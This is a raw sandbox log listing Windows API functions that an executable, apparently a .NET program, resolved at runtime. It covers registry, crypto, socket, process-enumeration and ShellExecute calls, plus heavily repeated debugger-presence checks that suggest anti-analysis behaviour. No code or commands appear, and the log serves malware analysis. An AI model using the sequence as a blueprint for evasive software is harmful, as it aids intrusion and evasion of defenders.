DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: USER32.dll/GetWindow
DynamicLoader: USER32.dll/IsWindowVisible
DynamicLoader: USER32.dll/IsWindowVisibleW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/GetModuleFileName
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: rasapi32.dll/RasEnumConnections
DynamicLoader: rasapi32.dll/RasEnumConnectionsW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: rtutils.dll/TraceRegisterExA
DynamicLoader: rtutils.dll/TracePrintfExA
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: WS2_32.dll/WSAStartup
DynamicLoader: WS2_32.dll/WSASocket
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/setsockopt
DynamicLoader: WS2_32.dll/WSAEventSelect
DynamicLoader: WS2_32.dll/ioctlsocket
DynamicLoader: WS2_32.dll/closesocket
DynamicLoader: kernel32.dll/GetComputerName
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptor
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/CreateFileMapping
DynamicLoader: kernel32.dll/CreateFileMappingW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/MapViewOfFile
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/CreateWellKnownSid
DynamicLoader: ADVAPI32.dll/CreateWellKnownSidW
DynamicLoader: kernel32.dll/CreateMutex
DynamicLoader: kernel32.dll/CreateMutexW
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/OpenMutex
DynamicLoader: kernel32.dll/OpenMutexW
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: kernel32.dll/GetProcessTimes
DynamicLoader: kernel32.dll/GetProcessTimesW
DynamicLoader: WS2_32.dll/ioctlsocket
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: kernel32.dll/FormatMessage
DynamicLoader: kernel32.dll/FormatMessageW
DynamicLoader: WS2_32.dll/WSAEventSelect
DynamicLoader: rasapi32.dll/RasConnectionNotification
DynamicLoader: rasapi32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: ADVAPI32.dll/RegOpenCurrentUser
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegNotifyChangeKeyValue
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: winhttp.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: winhttp.dll/WinHttpDetectAutoProxyConfigUrl
DynamicLoader: kernel32.dll/GlobalFree
DynamicLoader: WS2_32.dll/getaddrinfo
DynamicLoader: WS2_32.dll/
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: IPHLPAPI.DLL/GetNetworkParams
DynamicLoader: DNSAPI.dll/DnsQueryConfig
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: IPHLPAPI.DLL/GetIpInterfaceEntry
DynamicLoader: IPHLPAPI.DLL/GetBestInterfaceEx
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: WS2_32.dll/inet_addr
DynamicLoader: WS2_32.dll/getaddrinfo
DynamicLoader: WS2_32.dll/freeaddrinfo
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: WS2_32.dll/WSAConnect
DynamicLoader: security.dll/EnumerateSecurityPackagesW
DynamicLoader: security.dll/FreeContextBuffer
DynamicLoader: mscoree.dll/ND_RI8
DynamicLoader: mscoreei.dll/ND_RI8_RetAddr
DynamicLoader: mscoreei.dll/ND_RI8
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrlenWW
DynamicLoader: kernel32.dll/RtlMoveMemory
DynamicLoader: kernel32.dll/RtlMoveMemoryW
DynamicLoader: security.dll/FreeCredentialsHandle
DynamicLoader: security.dll/AcquireCredentialsHandleW
DynamicLoader: schannel.DLL/SpUserModeInitialize
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: security.dll/DeleteSecurityContext
DynamicLoader: security.dll/InitializeSecurityContextW
DynamicLoader: WS2_32.dll/send
DynamicLoader: WS2_32.dll/recv
DynamicLoader: WS2_32.dll/setsockopt
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/RtlMoveMemory
DynamicLoader: kernel32.dll/RtlMoveMemoryW
DynamicLoader: shell32.dll/ShellExecuteEx
DynamicLoader: shell32.dll/ShellExecuteExW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: ADVAPI32.dll/EventEnabled
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: OSPPOBJS.DLL/SppPluginInitialize
DynamicLoader: OSPPOBJS.DLL/SppPluginShutdown
DynamicLoader: OSPPOBJS.DLL/SppPluginCreateInstance
DynamicLoader: OSPPOBJS.DLL/SppPluginCanUnloadNow
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: SspiCli.dll/GetUserNameExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ADVAPI32.dll/NotifyServiceStatusChangeW
DynamicLoader: SETUPAPI.dll/SetupDiGetClassDevsW
DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInfo
DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceRegistryPropertyW
DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInterfaces
DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceInterfaceDetailW
DynamicLoader: kernel32.dll/GetSystemFirmwareTable
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
